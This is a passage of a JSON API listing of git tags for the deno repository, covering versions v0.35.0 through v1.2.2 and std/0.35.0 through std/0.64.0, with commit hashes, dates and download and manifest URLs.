gs/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"h